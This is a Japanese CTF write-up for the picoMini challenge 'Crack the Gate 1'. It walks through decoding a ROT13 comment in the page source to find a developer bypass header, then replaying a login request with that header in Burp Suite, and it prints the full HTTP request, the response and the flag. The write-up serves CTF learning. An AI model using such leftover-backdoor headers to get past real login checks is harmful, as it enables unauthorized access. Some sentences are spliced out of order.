picoMini by CMU-Africa 「Crack the Gate 1」 [EASY]
picoMini サイトにアクセスし,開発者ツールでソースコードを見てみると,謎のコメントが記載されています. 経験則に基づき,暗号化アルゴリズムが 細工したheaderを挿入するため,ログインフォームを
Rot13ではないかと考えました.
よって,Cyber Chefを用いて,復号してみるとJack - temporary bypass: use header "X-Dev-Access: yes"という情報が入手できました.
下の文言にも,本番環境では削除しろと記載されているため,開発環境ログインのためのヘッダであると推測しました.<!-- ABGR: Wnpx - grzcbenel olcnff: hfr urnqre "K-Qri-Npprff: lrf" -->
<!-- Remove before pushing to production! -->
burpsuiteでインターセプトし,Repeaterに送信します.
与えられているemailと適当なパスワードを用いて,X-Dev-Access: yesを付けて送信すると,flagが入手できました.// Request
POST /login HTTP/1.1
Host: amiable-citadel.picoctf.net:60689
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
X-Dev-Access: yes <--- add header
Referer: http://amiable-citadel.picoctf.net:60689/
Content-Type: application/json
Content-Length: 53
Origin: http://amiable-citadel.picoctf.net:60689
DNT: 1
Connection: keep-alive
Priority: u=0
{"email":"ctf-player@picoctf.org","password":"admin"}
// Response
HTTP/1.1 200 OK
X-Powered-By: Express
Content-Type: application/json; charset=utf-8
Content-Length: 127
ETag: W/"7f-08c0XQDBsrF6m1lSovMrUmsZSUo"
Date: Sat, 22 Nov 2025 14:13:37 GMT
Connection: keep-alive
Keep-Alive: timeout=5
{"success":true,"email":"ctf-player@picoctf.org","firstName":"pico","lastName":"player","flag":"picoCTF{brut4_f0rc4_3c6b118b}"}